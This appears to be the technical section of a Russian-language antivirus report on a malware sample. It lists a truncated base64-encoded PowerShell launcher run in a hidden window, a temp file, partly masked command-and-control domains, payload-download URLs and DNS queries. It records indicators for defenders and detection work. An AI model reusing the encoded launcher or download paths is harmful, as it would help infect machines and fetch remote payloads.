Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAWQAwAEcAdAA9ACAAWwBUAFkAUABlAF0AKAAiAHsAMwB9AHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBpAFIAZQBDAHQAbwAnACwAJwBSACcALAAnAFkAJwAsACcAUwB5AFMAVABFAG0ALgBpAG8ALgBkACcAKQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\1162425.cvr
- 'ro#####presshair.com':80
- 'kb###.ilmci.com':80
- 'ti###bor.com':80
- 'ti###bor.com':443
- 'so#####e-capital.com':443
- 'di####lklinik.com':443
- 'qu#####mathtutors.com':443
- http://kb###.ilmci.com/wp-includes/z/
- http://ti###bor.com/images/Du1/
- 'ti###bor.com':443
- 'so#####e-capital.com':443
- 'di####lklinik.com':443
- 'qu#####mathtutors.com':443
- DNS ASK ro#####presshair.com
- DNS ASK kb###.ilmci.com
- DNS ASK ti###bor.com
- DNS ASK 03##hhd.com
- DNS ASK so#####e-capital.com
- DNS ASK di####lklinik.com
- DNS ASK qu#####mathtutors.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAWQAwAEcAdAA9ACAAWwBUAFkAUABlAF0AKAAiAHsAMwB9AHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBpAFIAZQBDAHQAbwAnACwAJwBSACcALAAnAFkAJwAsACcAUwB5AFMAVABFAG0ALgBpAG8ALgBkACcAKQ...' (со скрытым окном)